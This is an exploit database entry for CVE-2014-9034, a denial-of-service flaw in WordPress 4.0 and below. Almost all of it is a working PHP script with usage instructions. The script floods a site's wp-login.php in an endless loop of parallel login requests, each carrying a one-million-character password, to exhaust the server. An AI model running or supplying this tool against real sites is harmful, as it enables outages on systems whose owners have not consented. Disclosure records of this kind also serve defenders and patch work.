WordPress 4.0 Denial Of Service Exploit

2014-12-01T00:00:00
ID 1337DAY-ID-22949
Type zdt
Reporter John Martinelli
Modified 2014-12-01T00:00:00

Description

WordPress versions 4.0 and below suffer from a denial of service vulnerability.

                                        
                                            <?php

echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by [email protected] (http://secureli.com)\n\n";
echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";

echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];

do {
 
$multi = curl_multi_init();
$channels = array();

for ($x = 0; $x < $argv[3]; $x++) {
  $ch = curl_init();

  $postData = array(
    'log' => $argv[2],
    'pwd' => str_repeat("A",1000000),
    'redirect_to' => $argv[1] . "/wp-admin/",
    'reauth' => 1,
    'testcookie' => '1',
    'wp-submit' => "Log%20In");

  $cookieFiles = "cookie.txt";

  curl_setopt_array($ch, array(
      CURLOPT_HEADER => 1,
      CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
      CURLOPT_REFERER => $argv[1] . "/wp-admin/",
      CURLOPT_COOKIEJAR => $cookieFiles,
      CURLOPT_COOKIESESSION => true,
      CURLOPT_URL => $argv[1] . '/wp-login.php',
      CURLOPT_RETURNTRANSFER => true,
      CURLOPT_POST => true,
      CURLOPT_POSTFIELDS => $postData,
      CURLOPT_FOLLOWLOCATION => true));
   
    curl_multi_add_handle($multi, $ch);
 
    $channels[$x] = $ch;
}
 
$active = null;

do {
  $mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
 
while ($active && $mrc == CURLM_OK) {
    do {

        $mrc = curl_multi_exec($multi, $active);
    } while ($mrc == CURLM_CALL_MULTI_PERFORM);
}

foreach ($channels as $channel) {
    curl_multi_remove_handle($multi, $channel);
}
 
curl_multi_close($multi);
echo ".";
} while (1==1);

?>

#  0day.today [2018-01-06]  #